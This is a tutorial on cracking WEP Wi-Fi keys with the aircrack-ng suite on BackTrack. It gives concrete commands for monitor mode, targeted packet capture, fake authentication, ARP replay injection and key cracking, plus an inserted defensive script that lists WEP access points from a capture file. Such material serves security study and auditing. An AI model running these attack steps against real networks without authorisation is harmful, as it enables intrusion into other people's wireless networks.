0x00. Environment setup
OS : BackTrack 5 R3 (32-bit)
Kernel : Linux bt 3.2.6
0x01. iwconfig
Configure a wireless network interface.
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.
# iwconfig
0x02. airmon-ng
airmon-ng is a script that can be used to enable monitor mode on wireless interfaces.
airmon-ng <start|stop> <interface>
# airmon-ng start wlan0
0x03. airodump-ng
A wireless packet capture tool for aircrack-ng.
airodump-ng [options] <interface>
# airodump-ng mon0
To capture a specific wireless network:
[Options]
-c <channel>[,<channel>[, ...]]
--channel <channel>[,<channel>[, ...]]
: Indicate the channel(s) to listen to. By default airodump-ng hops on 2.4GHz channels.
-w <prefix>
--write <prefix>
: The dump file prefix to use. If this option is not given, data is only shown on the screen. Besides this file, a CSV file with the same filename as the capture will be created.
[Filter options]
-d <bssid>
--bssid <bssid>
: Only show networks matching the given BSSID.
# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w WEP-Key mon0
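The CSV file written next to the capture can also be used from the defender's side, to inventory access points that still advertise WEP. The following is an added example, not part of the original post; the column positions are an assumption about the airodump-ng CSV layout, and the MAC addresses and ESSIDs in the sample are constructed.

```shell
#!/bin/sh
# Added example: list access points that advertise WEP in an airodump-ng CSV.
# Assumed columns of the AP section:
#   1 BSSID, 4 channel, 6 Privacy, 11 # IV, 14 ESSID
# Limitation: an ESSID that itself contains a comma is not handled.

# Print "BSSID channel IVs ESSID" for every AP whose Privacy field is WEP.
# Reads the file given as argument, or stdin when no argument is given.
wep_aps() {
    awk -F',' '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        # The client list starts with this header; only APs are of interest.
        /^Station MAC/ { exit }
        # Skip the AP header, blank lines and truncated rows.
        /^BSSID/ || NF < 14 { next }
        trim($6) ~ /WEP/ {
            printf "%s %s %s %s\n", trim($1), trim($4), trim($11), trim($14)
        }
    ' "$@"
}

# Constructed sample input (not captured data): two APs and one station.
sample_csv() {
    cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2016-09-01 10:00:00, 2016-09-01 10:05:00,  9,  54, WEP , WEP,   , -40,      120,    35012,   0.  0.  0.  0,   7, lab-wep, 
AA:BB:CC:00:00:02, 2016-09-01 10:00:02, 2016-09-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -55,       98,        0,   0.  0.  0.  0,   8, lab-wpa2, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:10, 2016-09-01 10:00:05, 2016-09-01 10:05:00, -48,      310, AA:BB:CC:00:00:01,
EOF
}

# Run against the constructed sample; pass a real CSV path to wep_aps instead.
sample_csv | wep_aps
```

Any access point this lists should be moved to WPA2 or WPA3.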
0x04. aireplay-ng
Inject packets into a wireless network to generate traffic.
The fake authentication attack.
aireplay-ng <options> <replay interface>
[Attack modes]
-1 <delay>
--fakeauth=<delay>
: The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) plus associate with the access point (AP).
[Replay options]
-e <essid>
: Set target SSID (for the fake authentication attack).
-a <bssid>
: Set Access Point MAC address.
-h <smac>
: Set source MAC address.
# aireplay-ng -1 0 -e WEP -a 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0
The classic ARP request replay attack.
aireplay-ng <options> <replay interface>
[Attack modes]
-3
--arpreplay
: The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably.
[Filter options]
-b <bssid>
: MAC address of Access Point.
[Replay options]
-h <smac>
: Set source MAC address.
# aireplay-ng -3 -b 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0
0x05. aircrack-ng
An 802.11 WEP / WPA-PSK Key Cracker.
aircrack-ng [options] <.cap / .ivs file(s)>
# aircrack-ng WEP-Key-01.cap